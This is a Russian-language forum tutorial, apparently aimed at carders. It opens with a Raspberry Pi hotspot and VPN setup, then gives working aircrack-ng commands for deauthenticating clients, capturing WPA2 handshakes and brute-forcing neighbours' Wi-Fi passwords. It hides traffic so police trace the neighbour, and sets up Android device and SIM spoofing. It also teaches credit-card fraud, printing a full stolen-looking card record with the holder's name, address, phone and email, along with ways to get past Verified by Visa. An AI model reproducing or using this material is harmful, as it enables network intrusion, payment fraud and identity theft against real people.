ht_capab=[HT40][SHORT-GI-20][DSSS_CCK-40]

macaddr_acl=0

auth_algs=1

ignore_broadcast_ssid=0

wpa=2

wpa_key_mgmt=WPA-PSK

wpa_pairwise=TKIP

rsn_pairwise=CCMP

Я сначала распишу все что необходимо сделать а уже потом буду объяснять зачем это все

Где

WIFI_Limon - название вашего WIFI, который будет раздаваться.

12345432 - пароль к вашему WIFI

Включить автозагрузку нашей конфигурации

sudo sed -i /etc/default/hostapd -e '/DAEMON_CONF=/c DAEMON_CONF="/etc/hostapd/hostapd.conf"'

Разрешить выдавать айпи интерфейсам для раздачи

sudo nano /etc/sysctl.conf

И добавить в конце конфига код

### Controls IP packet forwarding ###

net.ipv4.ip_forward = 1

#net.ipv6.conf.all.forwarding = 1

### Deny IPv6 ###

net.ipv6.conf.all.disable_ipv6 = 1

net.ipv6.conf.default.disable_ipv6 = 1

### Deny input ICMP ###

net.ipv4.icmp_echo_ignore_broadcasts = 1

net.ipv4.icmp_echo_ignore_all = 1

### Controls the use of TCP syncookies ###

net.ipv4.tcp_syncookies = 1

### Turn on SYN-flood protections ###

net.ipv4.tcp_syn_retries = 5

net.ipv4.tcp_synack_retries = 5

Конфигурация dnsmasq

Сначала удалим оригинальный конфиг:

sudo rm /etc/dnsmasq.conf

И потом создадим новый:

sudo nano /etc/dnsmasq.conf

И добавить код:

interface=br0

listen-address=192.168.44.1

bind-interfaces

domain-needed

bogus-priv

no-poll

no-resolv

server=8.8.8.8

stop-dns-rebind

clear-on-reload

dhcp-option=3,192.168.44.1

dhcp-option=6,192.168.44.1

dhcp-range=192.168.44.70,192.168.44.150,12h

dhcp-authoritative

Теперь настроим фаервол.

iptables - пополярный фаерволл для Linux. Он есть во всех Linux системах.

Прописать три правила

sudo iptables -t nat -A POSTROUTING -o wlan+ -j MASQUERADE

sudo iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE

sudo iptables -t nat -A POSTROUTING -o tun+ -j MASQUERADE

При перезагрузке эти правила исчезнут, по этому нам необходимо установить библиотеку iptables-persistent что бы сохранить эти правила:

sudo apt-get install -y iptables-persistent

При установке спросят сохранить ли правила для IPV4, нажимать ДА (YES), второй вопрос для IPV6, выбор YES или NO не имеет значения, так как IPV6 у нас все-равно отключен.

Установка скриптов для работы IP SOCKS, тунелей и так далее.

Сначала зайти в учетку root

sudo -s

sudo nano /etc/apt/sources.list

Добавить строку:

deb

Пожалуйста Авторизуйтесь или Зарегистрируйтесь для просмотра скрытого текста.

kali-rolling main non-free contrib

Нажать Ctrl+c

Далее обновляемся:

sudo apt-get update

Смотрим сетевые интерфейсы:

sudo ifconfig -a

Устанавливаем библиотеку для работы с сетевым трафиком:

sudo apt-get install aircrack-ng

После окончания установки:

sudo nano /etc/apt/sources.list

И поставить решетку перед строкой: #deb

Пожалуйста Авторизуйтесь или Зарегистрируйтесь для просмотра скрытого текста.

kali-rolling main non-free contrib

То есть закомментировать как я ранее говорил

Нажать снова Ctrl+C

Снова апдейтимся:

sudo apt-get update

И дальше, для тех кто приобрел к примеру антены которые я советовал и адаптер Альфу, мы устанавливаем драйвера

sudo apt-get install -y bc git dkms libncurses5-dev

sudo wget "

Пожалуйста Авторизуйтесь или Зарегистрируйтесь для просмотра скрытого текста.

" -O /usr/bin/rpi-source

sudo chmod 755 /usr/bin/rpi-source

sudo rpi-source

git clone

Пожалуйста Авторизуйтесь или Зарегистрируйтесь для просмотра скрытого текста.



cd rtl*

sudo sed -i 's/CONFIG_PLATFORM_I386_PC = y/CONFIG_PLATFORM_I386_PC = n/g' Makefile

sudo sed -i 's/CONFIG_PLATFORM_ARM_RPI = n/CONFIG_PLATFORM_ARM_RPI = y/g' Makefile

sudo ./dkms-install.sh

Каждая команда начинается с новой строки

После установки всего перезагружаем Raspberry

Все, наш Raspberry настроен. Настроил WIFI, установил все необходимые библиотеки для работы, а так же весь необходимый софт, и соответственно установил драйвера для адаптера Alfa и подключил к нему аентены на 19DBI. Примерный радиус приема этих антен составляет 2-3км, но при отсутствии помех радиус может достигать 5ти километровэ

Например я антены выставил за окно, но накрыл их типа мини крышей что бы на них влияло минимум погодных условий, хотя они предназначены для использования под открытым небом

Если это тв квартире допустим то за окно можно не выставлять

Немножко об оборудовании Alfa, которое я буду использовать

В качестве примера я буду использовать:

Антены, кол. 2 шт.: WI FI АНТЕННА ПАНЕЛЬНАЯ ALFA NETWORK APA-L2419 -19ДБ

Адаптер, кол. 1 шт.: WI FI АДАПТЕР ALFA AWUS036ACH

Вот тут внимание при покупке

ИСКЛЮЧИТЕЛЬНО производство Тайвань. Компания Лондонская, но завод изготовитель находится в Тайване. На сегодняшний день продается слишком много подделок. По адаптеру, обязательно учитывать какой чипсет стоит в адаптере.

Чипсет (касательно версии данного аппарата) должен быть RTL9912AU, технические характеристики данного оборудования вы можете найти в интеренете. Не всегда нужно брать две антены, если адаптер на один выход, то и антена необходима лишь одна. В данном адаптере необходимо две антены

В РФ оригинальную Alfa можно купить по ссылкам:

Адаптер:

Пожалуйста Авторизуйтесь или Зарегистрируйтесь для просмотра скрытого текста.



Антены:

Пожалуйста Авторизуйтесь или Зарегистрируйтесь для просмотра скрытого текста.



Для взлома WIFI сетей я установил AirCrack

Начнем пожалуй именно с этого. Со взлома WIFI. Уверен что каждый из вас задавался вопросом, как же блин взломать вифи соседа когда у самого интернет не оплачен))))

Есть разные способы взлома WIFI сетей, сегодня я опишу способ взлома посредством собирания хендшейков (handshake), это файл рукопожатия (синхранизации) между роутером и пользователем в момент авторизации

Первое что необходимо сделать, это посмотреть, какой сетевой интерфейс у Alfa адаптера. Сделать это можно с помощью команды:

sudo airmon-ng


Пожалуйста Авторизуйтесь или Зарегистрируйтесь для просмотра скрытого текста.



Итак, мы знаем что наш интерфейс это wlan1

далее необходимо перевести его в режим мониторинга. Это можно сделать несколькими способами, да и собственно сам WIFI можно взламывать несколькими способами. Самый простой способ это:

sudo airmon-ng start wlan1

Но мы же простых путей не ищем, правда? Пойдем другим способом с усилением сигнала антены

Деактивировать Альфу

sudo ip link set wlan1 down

Перевести в режим мониторинга

sudo iw dev wlan1 set type monitor

Активировать Альфу:

sudo ip link set wlan1 up

Усилить сигнал:

sudo iwconfig wlan1 txpower 30

Смотреть доступные для атаки точки доступа

Sudo airodump-ng wlan1

Я живу в дебрях, по этому у меня ближайший WIFI может быть в метрах 250, и так через каждые 250 метров по радиусу. По этому у меня не сильно много будет WIFI точек, но все же:


Пожалуйста Авторизуйтесь или Зарегистрируйтесь для просмотра скрытого текста.



BSSID - это МАС адрес роутера

PWR- это сигнал

ENC -это тип сети

WPA2 - это сеть запароленная,

OPN соответственно незапароленная.

Сегодня мы разбираем взлом запароленых сетей.

ESSID - это название точки доступа.

CH - канал роутера

В принципе это то что нас будет интересовать в данной таблице

Когда определитесь с точкой доступа, которую будем атаковать, останавливаем мониторинг Ctrl+C

Открываем новый терминал (этот не закрываем), и запускаем сбор хендшейков с определенного роутера:

sudo airodump-ng --bssid 24:65:C9:C1:B3:22 -c 7 -w WifiVasy wlan1

24:65:C9:C1:B3:22 - MAC адрес роутера

-c 7 - канал роутера

-w WifiVasy - название файла в который будем записан hadshake.


Пожалуйста Авторизуйтесь или Зарегистрируйтесь для просмотра скрытого текста.



1 и 2 - это MAC адрес роутера

3 - мак адрес клиента, подключенного к роутеру

4 - название точки доступа.

Собирать хендшейки можно долго, но для увеличения скорости сбора придумали принудительную деактивацию клиента от роутера. Хендшейк ловится в момент подключения клиенита к роутеру. И для этого у нас есть все необходимое: роутер, клиент, raspberry

Открываем ЕЩЕ один терминал, и в нем пишем команду:

sudo aireplay-ng -0 10 -a 24:65:C9:C1:B3:22 wlan1

0 - означает деаунтефикация

10 - количество запросов на деактивацию

24:65:C9:C1:B3:22 - MAC адрес роутера


Пожалуйста Авторизуйтесь или Зарегистрируйтесь для просмотра скрытого текста.



Вот так выглядит принудительная деаунтефикация клиента от роутера, простыми словами отключить соседа от его вайфая что бы он автоматически снова начал подключатьсяэ

Итак, мы послали 10 запросов на деаунтефикацию клиентов от роутера. Это можно делать на определенного клиента, вот почему я выше подчеркнул, что у нас есть так же мак адрес клиента. Атака на определенного клиента-роутер можно осуществить следующей командой:

sudo aireplay-ng -0 10 -a 24:65:C9:C1:B3:22 -с 76:23:А4:S7:B8:98 wlan1

Где -с 76:23:А4:S7:B8:98 - MAC адрес клиента

В основном терминале (где вы писали команду sudo airodump-ng --bssid 24:65:C9:C1:B3:22 -c 7 -w WifiVasy wlan1) в правом верхнем углу появится надпись [WPA handshake: <MAC>], она говорит нам о том, что хендшейк уже захвачен (помйман)

В дальнейшем я расскажу о другом способе сбора хендшейков с WIFi сетей, а так же о другом способе взлома, посредством сбора PMKID,в котором не нужно будет расшифровывать пароль. Ну всмысле когда нибудь расскажу

А для тех кто хочет результат не меньше вышеописанный но не хочет ебаться со всем этим, аиркрек придумал автоматический сбор хэндштеков со всех точке доступа

Автоматический сбор рукопожатий с помощью besside-ng

sudo besside-ng wlan1

Перекур извините отъехать нужно срочно, через 40 минут продолжим.

Вопросы сможете задать после лекции или в течении лекции если пожелаете

Если у кого есть вопросы по текущему материалу - пишите. вернусь скоро и отвечу.


Пожалуйста Авторизуйтесь или Зарегистрируйтесь для просмотра скрытого текста.



Мы остановились на сборе хэндшейков при взломе вифи

Допустим мы поймали нужный хендшейк, заходим по SFTP на Raspberry, в корневую папку. Нас интересует файл с расширением .cap


Пожалуйста Авторизуйтесь или Зарегистрируйтесь для просмотра скрытого текста.



О том как взламывать такие файлы по словарю я могу каждому индивидуально,если это будет кому интересно, это довольно трудоемкий процесс. Но для наглядности покажу примерный процесс чуть ниже

Если у вас есть достойные словари по подбору пароля (в интернете их тысячи), то бросаем их в корень домашней директории, и вводим следующую команду:

aircrack-ng -w /home/pi/slovar.txt -e dlink WifiWasy.cap

Где:

/home/pi/slovar.txt - путь к словарю

dlink - название точки доступа

WifiWasy.cap - название хендшейка, который мы поймали.


Пожалуйста Авторизуйтесь или Зарегистрируйтесь для просмотра скрытого текста.



И вот так вот идет перебор пароля по словарю:


Пожалуйста Авторизуйтесь или Зарегистрируйтесь для просмотра скрытого текста.



Естественно я заренее добавил в словарь гдето в середину пароль от WIFI, который я брутил, что бы показать вам как выглядит пойманный пароль к точке доступа. Словарь у меня был из 500 слов, мощность компьютера у меня никак не для брута (скорость брута зависит от мощности комрьютера, на достаточной мощности пароль перебирается по 300 тысяч слов в секунду, в моем случаи это примерно 170 слов в секунду), по этому у меня нашло пароль быстро, аж за 3 секунды

Вот так вот выглядит сбрученный пароль:


Пожалуйста Авторизуйтесь или Зарегистрируйтесь для просмотра скрытого текста.



Но есть сайты которые делают это все за вас, за небольшое приемлемое вознаграждение

Например:

Сайт

Пожалуйста Авторизуйтесь или Зарегистрируйтесь для просмотра скрытого текста.

, брутят пароль быстро, у них очень хорошие мощностя.

Вот как пример из ЛК кабинета этого сайта:


Пожалуйста Авторизуйтесь или Зарегистрируйтесь для просмотра скрытого текста.



Как видим, два пароля уже восстановлено, и еще один на второй странице, его не видно. То есть к троим соседям я уже могу подключиться

По взлому WII закончим пожалуй, это была маленькая демонстрация во взлому соседей

Допустим мы взломали пароль от соседа, сканируем сеть:

sudo iwlist wlan1 scan

У нас будет информация такого вида:


Пожалуйста Авторизуйтесь или Зарегистрируйтесь для просмотра скрытого текста.



Нас интересует нужный нам ESSID и Adress, если вдруг вы его не записали ранее, хотя он так же есть в лк того сайта который расшифровал ваш пароль

дальше заходим в конфигурационный файл:

sudo nano /etc/wpa_supplicant/wpa_supplicant.conf

И в самом низу вставляем код:

network={

ssid="The_ESSID_from_earlier"

psk="Your_wifi_password"

}

И дальше:

sudo ifdown wlan1

sudo ifup wlan1

Это мы типа выклбчили сетевой интерфейс и потом снова его включили, перезагрузили считайте без переагрузки Raspberry

Все. Мы подключены. Проверить можно следующим образом:

sudo iwconfig

iFconfog - посмотреть сетевые интерфейсы, а iWconfig посмотреть АКТИВНЫЕ сетевые интерфейсы


Пожалуйста Авторизуйтесь или Зарегистрируйтесь для просмотра скрытого текста.



Соответственно в зарисованны мною местах будет название точки доступа и мак адрес. В случаи если подключение не удалось - название точки доступа и мак будут отсутствовать

теперь разберем одну из основных я считаю функций. Это VPN. Основная она потому, что это наша безопасность. Про носки (соксы) мы поговорим потом, натягивать мы их будем поверх VPN

Следующие скрипты являются собственной разработкой, потому они входят как комплект для личного пользования при индивидуальной разработке. Все это можно настроить и установить самому из источников в интернете в случаи необходимости, я же скриптами лишь упростил пользование этим всем наобором софта, для мобильного использования и переключения.

Интерфейс VPN у Raspberry называется Tun+

Есть два типа VPN. С авторизацией и без. Естесевнно у большинства покупные VPN и они обязательно идут с авторизацией. Вот их и разберем. С конфигами без авторизации все просто, если у конфига нет авторизации то делать второй пункт ниже не нужно

Первое что необходимо сделать, это изменить расширение .ovpn на .conf . Можно скоратить имя. Допустим у меня VPN конфиг под названием limonvpn.conf

Второе: открыть файл как редактор и найти auth-user-pass и дописать /etc/openvpn/login, то есть должно получится так:

auth-user-pass /etc/openvpn/login

Третье: создать файл login (без расширения) и прописать в нем:

login

password

Где login и password - вводить логин и пароль от VPN. Сохранить.

Четвертое: отправить два файла на Raspberry в домашнюю папку /home/pi с помощью SFTP в Bitvise.

пятое: теперь необходимо их переместить из домашней директории в другую папку /etc/openvpn . Вспоминаем команды в самом начале которые я давал как FAQ

sudo mv [откуда] [куда]

sudo mv limonvpn.conf /etc/openvpn/

sudo mv login /etc/openvpn/

Все. VPN готов.

FAQ для использования:

OpenVPN

====================

sudo systemctl start openvpn - подключиться к впн

sudo systemctl stop openvpn - отключиться

sudo systemctl restart openvpn - рестарт

sudo systemctl enable openvpn - включить автозагрузку

sudo systemctl disable openvpn - убрать из автозагрузки

Если в папке /etc/openvpn/ много конфигов - выбрать один конфиг для подключения:

sudo nano /etc/default/openvpn и найти AUTOSTART="name" и расскоментировать и дописать имя конфига без расширения.

Часто задаются вопросом, можно ли запретить трафик при обрыве VPN, что бы не спалить случайно свой IP или IP своего соседа, к которому потом наведуются люди в синей форме

Запретить трафик при обрыве VPN.

Добавить правила

sudo iptables -A INPUT -i tun+ -j ACCEPT

sudo iptables -A OUTPUT -o tun+ -j ACCEPT

После изменения фаерволла сохранить правила

sudo netfilter-persistent save

Удалить правила

sudo iptables -D INPUT -i tun+ -j ACCEPT

sudo iptables -D OUTPUT -o tun+ -j ACCEPT

После изменения фаерволла сохранить правила

sudo netfilter-persistent save

то же касается остальных скриптов, а это PPTP, SOCKS. SSH, IP CHECK, то для них просто FAQ по использованию, настройкам они не подлежат:

PPTP Limon

====================

sudo limonpptp pon [IP] [логин] [пароль] - подключиться к PPTP

sudo limonpptp -s - отсоединить

sudo limonpptp stop - отсоединить

sudo limonpptp poff - отсоединить

SOCKS Limon - подключение к proxy

===================

sudo limonsocks [тип] [IP] [порт] - прокси без авторизации

sudo limonsocks [тип] [IP] [порт] [логин] [пароль] - прокси с авторизацией

Изменить DNS - после слова limonsocks добавить аргумент -d [IP-DNS]

sudo limonsocks -s - отсоединить

sudo limonsocks stop - отсоединить

SSH Limon - подключение к SSH

===================

sudo limonssh [логин]@[IP] - подключиться к SSH (по умолчанию порт 22)

sudo limonssh [логин]@[IP]:[порт] - если у SSH другой порт, то вводить порт

Изменить DNS - после слова limonssh добавить аргумент -d [IP-DNS]

Ctrl+C - отсоединить


Пожалуйста Авторизуйтесь или Зарегистрируйтесь для просмотра скрытого текста.

- Выбрать любую страну DNS

IP Limon - чек IP

====================

sudo limonip ip - мой ip

sudo limonip ip [IP] - другой IP/DNS

sudo limonip http [IP] [порт] - HTTP/S

sudo limonip http+ [IP] [порт] [логин] [пароль] - HTTP/S с авторизацией

sudo limonip socks4 [IP] [порт] - SOCKS4

sudo limonip socks4a [IP] [порт] - SOCKS4a

sudo limonip socks5 [IP] [порт] - SOCKS5

sudo limonip socks5+ [IP] [порт] [логин] [пароль] - SOCKS5 с авторизацией

Изменить основной DNS

===================

sudo limondns [IP-DNS]

Многие так же задаются вопросом, можно ли менять МАС адрес на Raspbery - ответ: МОЖНО

Подмена MAC

===================

sudo nano /etc/network/interfaces и расскоментировать (убрать решетку #)

----------------

#pre-up ifconfig ИНТЕРФЕЙС hw ether 00:00:00:00:00:00

----------------

Чтобы изменение применялось, перезагрузить малинку:

sudo reboot

Если есть те кто еще не сильно знаком с кардингом. то разберем что такое сс, с чем его едят и как оно выглядит

Что такое кредитная карта? Думаю, всем очевиден этот вопрос. Это карта с магнитной лентой и чипом, на котором хранится информация о состоянии нашего денежного баланса и тд

С помощью магнитных лент и чипов мы расплачиваемся в магазинах, снимаем деньги в банкоматах, на карте так же отчеканы данные.

Эти данные используются для осуществления онлайн покупок в интеренте

На карте отбиты следующие данные: номер карты, имя фамилия владельца, дата истечения срока службы карты, с обратной стороны, там где должна быть подпись владельца, напечатан код безопасности из трех или пяти цифер, в зависимости от типа карты. О типах мы поговорим позже.

Итак, как же выглядит сс? А выглядит оно вот так:

4270 8150 0144 9160 | 01 | 19 | 506 | 10128 | US | NY | New York | 1199 Park Avenue, Apt. 7F | Robert J Von Phul | 6465300364 | classic | credit | usaa savings bank | male | [email protected] DBdec/2016 | Approve |

первые 16 цифр, разделенные по 4 (в разных шопах по разному, есть разделенные и неразделенные, но везде 16 цифр) - это номер карты

У карт есть брэнды. В США их 4 основных: VISA, MasterCard. American Express и Discovery

Начимся их отличать. Visa ВСЕГДА начинается с цифры 4, Mastercard начинается с цифры 5, Discovery с цифры 6 и Amex с цифры 3

Номер карты генерируется по специальному алгоритму. Причем первые 6 цифр для конкретного взятого банка являются константой. Они называются Bin - bank identification number.

То, что эти 6 цифр постоянны, очень полезно для нас, кардеров, поскольку с помощью них мы можем осуществить поиск и покупать аналогичные карты того же банка

Далее, 01 19 - это месяц и год истечения карты. В шопах частенько вместо 01 могут писать January, 02 - February и тд. По этому учим названия месяцев по английски

19 - это, понятно, год. В некоторых шопах используется четырехзначное значение - 2019

606 - это защитный код карты. Он называется по разному: Card Verification Number (CVN), CVV, CVV2, CSC (Card Security Code)

10128 - это ZIP, postal code. Почтовый индекс адреса владельца карты.

Это очень важная вещь для карты, потому что многие мерчи сверяют именно зип карты

US - это код страны

Причем надо отметить, что иногда бывает так, что карта выпущена банком, не являющимся частью американской банковской системы, но имеет американский биллинг адрес. Таких карт много из канады, допустим. Тут надо смотреть по обстоятельствам.

NY - это код штата Штатов в америке 50. Причем в некоторых шопах пишут полное название штата при выборе на чекауте

New York - город. Город может записываться по разному, если он имеет сложное название, скажем, Fort Lauderdale пишут и Ft. Lauderdale. Советую писать информацию полностью согласно тому. как пишет ее владелец карты.

1199 Park Avenue, Apt. 7F - это адрес, и он может записываться тоже по разному, для адреса на чекауте предоставляется 2 строки, на первой пишется номер улицы, на второй пишется номер квартиры, если дом многоэтажный. Можно эту информацию по разному записывать, можно записать все на одной строке. После Avenue пробел и сразу Apt. Можно на второй перенести, тут как кому больше нравится

Robert J Von Phul - это имя кх (кх = Card Holder, то есть владелец карты) на карте. если нужно написать first и last name, то выбрасывается инициал middle name/ Если нужно записать как написано на карте, то пишите полностью. Потому что инициалы действительно отпечатывают на картах в качестве части имени. Далеко не все мерчи могут проверять имя, например, пейпал (PayPal)

По этому, если вам попалась организация, не паникуйте. На карте действительно вместо людских имен бывают имена организаций. В некоторых случаях я допускал писать имя организации в точности, как написано на карте, в некоторых я просто менял это имя на человеческое.

6465300364 - десятизначный номер телефона кх. Вот тут внимание, тут тоже много вариантов. Если у шопа есть доступ в БГ или он прозванивает банк, не советую менять номер. Если шоп небольшой и прозванивает только что бы подтвердить то, что вы указали в ордере, тогда можно менять на единичку в конце и прозванивать с подменой номера. Обычно этим занимаются стафферы (те кто вбивает товар)

Иногда случаются ситуации, когда вы купили сс, а у нее нет данных по номеру. Такое действительно случается и тут я рекомендую либо воспользоваться поиском по личностям intelius.com. Осуществляет поиск по public records - публичным данным, и порой неплохую выдает поднаготную на товарищей с редкими именами

classic - это уровень карт, от уровня карт зависят различные параметры вроде кредитного лимита и тд. К сожалению, не всегда уровень карты свидетельствует о том, что на ней будет куча бабла. Тут надо опять же заниматься статистической выборкой и формировать свой список бинов. Допустим, когда я вскрыл баг в одном шопе, мне нужен был бин, авторизующий 10к баксов, такой ордер, естественно, будет отменен, но мне нлавное, что бы прошла авторизация.

Я нашел несколько бинов уровня business. Вот на business картах с большой долей вероятности будет большая сумма денег, хотя встречаются и нищеброды-американцы, к сожалению, даже на business имеющие не более 300 баксов. Есть еще такой уровень карт - prepaid. Очень не рекомендую его покупать в связи с тем, что это карты немногократного использования, часто используются в качестве гифтов. Такие карты как правило не пополняются, сколько есть на них денег - столько и тратится и они лежат с нулевым балансом

usaa savings bank - это банк. Не слишком буду углубляться в банковскую систему США, отмечу только что у них есть как правило банки, кредитные организации и карты корпораций. Банков великое множество, есть популярные, есть не очень. У всех разные капиталы и число держателей счетов и карт. Самые популярные банки в США - Bank of America, Chase, Capital One.

Соответственно их карты в шопах с большой долей вероятности вбиваются другими кардерами. Есть много хороших и не сильно задроченных банков - pnc bank, huntington national bank, compass bank, world foremost bank.

Кредитные организации (credit union) - это еще один тип кредитных учреждений в США, которые занимаются ссудами, ипотеками и еще много чем. У них тоже есть популярные и малоизвестные кредитные организации локальных масштабов. Одним из самых популярных кредит юнионов является navy fcu.

так же есть организации, занимающиеся процессингом платежей по картам, и корпорации, выпускающие кредитные карты, допустим, pulse network llc, star processing, computers networks. На их картах можно с различной вероятностью найти деньги для снятия. Вот например, pulse network я снимал по 700 баксов с саморега PayPal. Star Processing послабее, где-то 150.

male - этот параметр предоставляется не во всех шопах. Пробив человека по базе имен и соотнесение имени с полом. Иногда имена имеют неясное отношение к конкретному полу, по этому пишут unisex. Данная информация полезна для изменения голоса на противоположный пол. male - мужчина, female - соответственно женщина.

[email protected] - это имейл кардхолдера. как правило, не относится к биллинг данным, вместо него мы всегда указываем свой, но туда частенько приходят отчеты от банка по просмотру стейтмента и трат, по этому при желании можно использовать софт или сервис и заспамить эту почту.

Approve - это статус карты. перед покупкой можно чекнуть карту на валид и в случаи невалида деньги всегда вернутся вам на счет, в шопах у которых допустим есть чек на валид. Тут можно целую дискуссию проводить, стоит или не стоит чекать карты свежих баз на валид перед покупкой. бытует мнение, что чекеры портят карты.

В принципе, от части это убеждение не лишено оснований. Потому что чекеры имеют одинаковые мерчи для процессинга карт и это может портить карты, особенно одних и тех же банков. Я бы рекомендовал проверять карты на валид перед покупкой с помощью бесчарджевого чекера simple. Нам очень важно, что бы адрес и сама карта были валидными.

Теперь поговорим об ответах чекера карт. Может сложится ситуация, когда мы купили лишнюю карту или же она не вошла в палку и мы отложили ее до лучших времен, и вот эти времена настали. Хотелось бы чекнуть эту карту еще раз перед вбивом в шоп.

Тут я рекомендую сервис

Пожалуйста Авторизуйтесь или Зарегистрируйтесь для просмотра скрытого текста.

.

Выбираем чекер и карта проверяется. В зависимости от валидности, нам могут показывать следующие коды:

00, 85 - это значит платёж успешно проведён, всё хорошо

05 - Do not honour - банк отклонил транзакцию без объяснения причин. значит деклайн. самая частая причина

43 - Pickup card, fraud account - карта возвращается в банк на перевыпуск из-за мошенничества, похожий код есть в случае простой потери карты

14 код - invalid card number - тоже означает, что карта перевыпущена и удалена из БД банка

AVS not match - значит не совпадает адрес. Кх переехал и изменил биллинг данные

Еще мне бы хотелось отдельно поговорить вот о какой вещи, о том, как осуществляется процессинг карты. Он может осуществляться как с помощью карт Verified by Visa (для Visa) и 3DSecure (для MasterCard), так и без них. Первый случай не очень часто распространенный, но в большинстве платежных систем он есть.

Карты могут быть vbv и novbv - тоесть к ним могут быть подключены системы верификации платежа платежным паролем или не подключены. Надо отметить, что без vbv трудно проводить платежи. Часто платеж деклайнится. Как быть с vbv? Тут есть 3 варианта развития событий

Карты могут быть "преэнроллены" для создания вбв-пароля, и что бы создать этот пароль, для каждого бина - бина, отмечу, даже не банк - есть свои правила. Практически всегда указываются данные с карты: имя, зип, свв2, дата истечения срока. Но вот только есть бины, в которых достаточно информации про зип, что бы создать платежный пароль. Есть бины, в которых нужно указать ссн и доб (SSN - идентификационный номер кх, DOB - дата рождения кх).

А есть бины, где сложная система, вроде usaa saving bank, там надо еще какуюто информацию о кх указать, то есть без БГ не обойтись.

3S Secure - это примерно то же, что и vbv, но уже касательно MasterCard кард. Для Discover, Amex не предусмотрнены такие защитные механизмы. Для вбивов советую использовать Visa, MC, реже - Discover.

На этом мини лекцию по сс мы и закончим.

теперь разберем вбив с телефона. Я его гдето вычитал, потестил, достаточно удачно, даже очень удачно. Вбив с телефона на ведре (android)

Настроить под вбив андроид может любой человек при наличии прямых рук и головы. Есть два типа вбива с телефона, собственно как и два типа людей: 1) те, кто не особо хочет копаться, это вбив с браузера телефона; 2) это вбив с приложения. Вариант гораздо сложнее, но в целом может каждому пригодится.

Первое что необходимо сделать - это получить root права на телефоне. Я использую Kingo root, скачиваю apk файл и устанавливаю, самый простой и эффективный метод получения root прав.

Весь список софта для андроида:

1. Kingo root

2. xposed installer (framework)

3. device id changer Pro

4. Proxy Droid

5. DNS Forwarder

6. xprivacy

7. ccleaner

8. root cloak

9. Location cheater

Для вбива с приложения вам просто необходим xposed framework, без него у вас вряд ли что получится или если вы меняете телефоны после каждого вбива - тогда да, можно обойтись и без этого софта. Но думаю это экономически не выгодно по этому юзаем именно этот софт. Это системная программа для изменения настроек прошивок (версий OS)

device id changer Pro - программа меняет идентификационные данные о железе вашего телефона (imei например) и другие параметры, это модуль xposed frameworka

Proxy droid - через него ставим соксы, но если вы будете подключаться к Raspberry на который вы будете надевать сокс, то в принципе вам эта программа нафиг не нужна.

DNS Forwarder - иногда, так случается, при подключенном носке отображается неверный DNS, в таком случаи юзаем этот софт и меняем DNS на тот, который нам необходим. Список DNS я скидывал ранее когда объяснял о настройку Raspberry и смены DNS на нем.

ccleaner - полагаю все знают что это такое, но для тех кто не знает: после каждого вбива этим софтом мы будем чистить телефон

Location cheater - служит для подмены данных местоположения

root cloak (модуль framework) - служит для того, что бы скрывать от других приложений. что телефон имеет root права

xprivacy - это софт, который подменяет симкарту и не только: он либо разрешает, либо запрещает видеть определенные сведения всем приложениям. В дополнение к ней я бы советовал приложение sim card, на нем можно отточить то что запрещать, а что разрешать приложениям видеть, что бы в них отображалась корректная информация об устройствах.

Все приложения (кроме ccleaner) не работают без root прав.

Сначала ставим xposed installer, после того как получили root права, через него устанавливаем framework. Скажу сразу, здесь мы столкнемся с трудностями поставить фреймворк, нам нужен андроид версии 4.4.4 (на него проще всего поставить эту прогу), на версиях выше сделать это крайне проблематично, но если вы умеете ставить кастомный рекавери и прошивать архивы то можете попробовать. В остальом советую у кого прошивка выше, откатить самим на ведро 4.4.4 или отнести в серсивный центр и вам там прошьют, стоит это не дорого. Плюс на 4.4.4 гораздо удобнее работать, чем на версиях выше.

Вот ссылка на 4pda, там найдете инсталлер на 4.4.4.(и версии выше)

Пожалуйста Авторизуйтесь или Зарегистрируйтесь для просмотра скрытого текста.



После того ткак поставили xposed framework ставим следуюющие программы:

device id changer Pro. Прошу обратить внимание, именно Pro версию!!! Дальше Proxy Droid (в случаи необходимости), DNS Forwarder, ccleaner, Location cheater, xprivacy, и root cloak. xprivacy и root cloak ставится внутри xposed installer,заходим в раздел Загрузка и там в поиске их изем и устанавливаем.

Ну и важное примечание: apkpure.com сразу сайт добавьте в закладки, и скачать приложения sim card (зеленая симка на ярлыке)

Когда вы поставили все выше перечисленные программы, нужно зайти в xposed installer, раздел Модули, и поставить галочки на всех модулях (device id ch/root cloak/xprivacy)

Потом зайти в раздел фремворка и прожать быстрая перезагрузка, что бы модули установились, если этого не сделать модули не будут корректно работать.

Собственно по установке на андроид - все. теперь поговорим об xprivacy, очень полезная штука когда работаешь с серьезными шопами, банками и тд, лично я его юзаю для подмены сим карты, по факту возможностей на много больше.

Заходим в него и переходиим в раздел параметры, трогаем только те значения что связаны с симкой:

А это:

номер телефона

MCC

MNC

код страны

оператор

ICC ID

ID подписки

Возьмем за основу номер 4356681778, если ктото подстраивается под холдера и ему нужно пробить оператора, идем сюда


Пожалуйста Авторизуйтесь или Зарегистрируйтесь для просмотра скрытого текста.



Что такое МСС - с этим можете ознакомиться здесь:


Пожалуйста Авторизуйтесь или Зарегистрируйтесь для просмотра скрытого текста.

, из этой же страницы можете взять значение для нашего параметра в проге

MNC это код оператора, посмотреть код нужного оператора (нажной страны) вы можете так же здесь:


Пожалуйста Авторизуйтесь или Зарегистрируйтесь для просмотра скрытого текста.

.

теперь что такое icc id и id подписки, и как его прописать

icc id это серийный номер симки, который состоит из 19 цифрю


Пожалуйста Авторизуйтесь или Зарегистрируйтесь для просмотра скрытого текста.



Первые 2 цифры 89 всегда ставятся по дефолту, это относится к отрасли, ее идентификатор. дальше то что выделено, это идет код страны, длиной от 1 до 3 цифр.


Пожалуйста Авторизуйтесь или Зарегистрируйтесь для просмотра скрытого текста.



По юсе это 01, по другим странам значения отличаются

Так поскльку мы подстраиваемся под юсу, в значении ICC ID первые 4 цифры будут всегда 8901, а остальные 15 цифр можно писать рандомно.

ID подписки (в xprivacy). А вообще это называется sim imsi. Как его прописать? Смотрим картинку.


Пожалуйста Авторизуйтесь или Зарегистрируйтесь для просмотра скрытого текста.



Он всегда состоит из 15 цифр. Прописываем сначала значение MMC, затем MNC, затем остальные цифры пишем рандомно, что бы в итоге было 15 сиволов в этом поле

Как сделать что бы данные подменялись, когда устанавливаете новое приложение: xprivacy кидает уведомление, и те данные что нужно подменить, нажимаете на кнопку запретить (deny)

и вот тут пригодится приложение Sim card, которое поможет набить руку какие начения подменять

Теперь опишу как происходит вбив

